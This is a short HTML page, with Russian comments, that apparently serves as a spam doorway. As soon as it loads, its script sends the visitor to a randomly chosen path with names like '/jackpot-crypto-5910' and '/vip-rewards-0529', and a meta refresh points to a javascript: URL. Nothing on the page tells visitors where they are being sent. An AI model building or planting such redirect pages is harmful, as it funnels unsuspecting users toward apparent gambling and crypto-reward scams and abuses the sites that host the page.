<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Redirecting...</title>
    <meta http-equiv="refresh" content="0; url='javascript:redirect()'">
    <script>
    const sites = ["/victory-top-7201", "/top-club-4167", "/vip-rewards-0529", "/crypto-official-0418", "/premium-official-8323", "/victory-rewards-2479", "/win-support-2094", "/win-play-4282", "/rewards-global-1746", "/jackpot-crypto-5910"];
    function redirect() {
        const randomUrl = sites[Math.floor(Math.random() * sites.length)];
        window.location.href = randomUrl;
    }
    redirect(); // Запускаем немедленно
    </script>
</head>
<body>
    <!-- Пустая страница. Редирект происходит мгновенно. -->
</body>
</html>